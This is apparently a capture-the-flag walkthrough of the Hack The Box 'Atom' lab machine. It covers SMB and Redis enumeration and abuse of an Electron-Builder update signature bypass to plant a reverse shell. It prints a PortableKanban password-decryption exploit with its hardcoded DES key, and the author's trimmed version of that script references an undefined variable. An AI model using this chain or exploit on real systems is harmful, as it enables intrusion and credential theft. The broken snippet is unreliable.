CTF Walkthroughs, Hack The Box

Hack The Box – Atom Walkthrough

Introduction

This was an intermediate Windows machine that involved exploiting a vulnerability in Electron-Builder to gain initial access, a clear-text Redis password, and a vulnerability in Portable Kanban to decrypt the administrator password and escalate privileges.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified a few open ports: port 80 (HTTP), port 135 (MSRPC), port 443 (HTTPS) and port 445 (SMB). When performing a scan with the -p flag, a few new ports are found, including a Redis server:

The next step will be to start enumerating HTTP.

Enumerating HTTP

When accessing the web server through a browser, the following page is displayed:

It mentions a note taking application being developed but it doesn’t have a whole lot of information

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

The scan has identified a /releases entry, when accessing it a zip archive is found:

Downloading the archive and unzipping it:

It appears to contain an EXE, and upon further inspection it seems to be the installer for the note taking application.

Enumerating SMB

When using SMBClient to enumerate open shares on the host, it appears to contain an unusual “Software_Updates” share:

When accessing the share, it looks like it contains a few folders and a “UAT_Testing_Procedures.pdf” document:

Whereas the other folders are empty. Downloading the PDF document:

The PDF contains a guide on the note taking app and it mentions that it was build using electron-builder:

This may be a hint as to what needs to be exploited to gain access to the machine.

Exploiting Electron-Builder

Did a quick Google search about Electron-Builder and found an interesting article about an RCE vulnerability that affects it:

The post mentions the following:

Electron-Builder advertises itself as a “complete solution to package and build a ready for distribution Electron app with auto update support out of the box”. For macOS and Windows, code signing and verification are also supported. At the time of writing, the package counts around 100k weekly downloads, and it is being used by ~36k projects with over 8k stargazers.

The signature verification check performed by electron-builder is simply based on a string comparison between the installed binary’s publisherName and the certificate’s Common Name attribute of the update binary. During a software update, the application will request a file named latest.yml from the update server, which contains the definition of the new release – including the binaryfilename and hashes.

Since the ${tempUpdateFile} variable is provided unescaped to the execFile utility, an attacker could bypass the entire signature verification by triggering a parse error in the script. This can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d “” -f1 | xxd -r -p | base64).

The first step is to generate some shellcode called “r’shell.exe” using MSFvenom with the following flags:

  • -p to specify the payload type, in this case, the Windows Reverse TCP Shell
  • LHOST to specify the localhost IP address to connect to
  • LPORT to specify the local port to connect to
  • -f to specify the format for the shell, in this case, exe

The sha512 payload is then generated calculating its hashsum, converting ot to binary and then to babse64:

Creating the latest.yml file as instructed in the article:

Setting up a Python Simple HTTP Server to host the shell:

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Uploading the latest.yml file to the client1 folder in the Software_Updated SMB share:

After a minute, the shell was downloaded and executed, granting a shell as the “jason” user:

Privilege Escalation

When navigating to “Program Files”, it appears to contain a “Redis” folder:

It contains some credentials in the redis.windows-service.conf file:

Upon consulting HackTricks, it appears there are a few ways to exploit Redis to gain remote access to a host, one way can be to obtain the database keys being used:

Authenticating Redis and dumping the keys:

redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat
keys *

Dumping the contents reveals an encrypted password for the administrator user:

get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0

The Downloads folder for the Jason user on the host contains a “portabelKanban” folder, which is a tool used to store passwords in an encrypted fashion:

When using SearchSploit to identify known vulnerabilities in this tool, there appears to be one that should allow to retrieve clear-text passwords. Mirroring the exploit:

Reviewing the exploit, basically it base64-decodes the encrypted password and then decrypts it using DES, with the encryption key provided in the script:

# Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
# Date: 9 Jan 2021
# Exploit Author: rootabeta
# Vendor Homepage: The original page, https://dmitryivanov.net/, cannot be found at this time of writing. The vulnerable software can be downloaded from https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Software Link: https://www.softpedia.com/get/Office-tools/Diary-Organizers- Calendar/Portable-Kanban.shtml
# Version: Tested on: 4.3.6578.38136. All versions that use the similar file format are likely vulnerable.
# Tested on: Windows 10 x64. Exploit likely works on all OSs that PBK runs on.
# PortableKanBan stores credentials in an encrypted format
# Reverse engineering the executable allows an attacker to extract credentials from local storage
# Provide this program with the path to a valid PortableKanban.pk3 file and it will extract the decoded credentials
import json
import base64
from des import * #python3 -m pip install des
import sys
try:
#first argument supplied when running the script is used as the .pk3 file
    path = sys.argv[1]
except:
    exit("Supply path to PortableKanban.pk3 as argv1")
def decode(hash):
    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')
with open(path) as f:
    try:
        data = json.load(f)
    except: #Start of file sometimes contains junk - this automatically seeks valid JSON
        broken = True
        i = 1
        while broken:
            f.seek(i,0)
            try:
                data = json.load(f)
                broken = False
            except:
                i+= 1
for user in data["Users"]:
    print("{}:{}".format(user["Name"],decode(user["EncryptedPassword"])))

The key used to encrypt passwords was probably found during an engagement when reverse-engineering the application.

It currently requires a pk3 file which is what is used by the application to store the encrypted passwords, but since it was already retrieved in Redis, all that is required is to use the decode function and provide the encrypted password(replacing “EncryptedPassword” with the one found in Redis:

import json
import base64
from des import * #python3 -m pip install des
import sys

def decode(hash):

    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')
for user in data["Users"]:
    print("{}:{}".format(user["Name"],decode(user["EncryptedPassword"])))

Using the script to decrypt the password:

Using Evil-WinRM to authenticate remotely as the Administrator user

This has granted administrator-level access to the target machine.

Conclusion

I wasn’t a huge fan of this machine at first, but after writing a walkthrough for it I started to appreciate how real-life this can be, as software is often built using vulnerable libraries or frameworks, and encrypted passwords stored using outdated tools is not at all uncommon.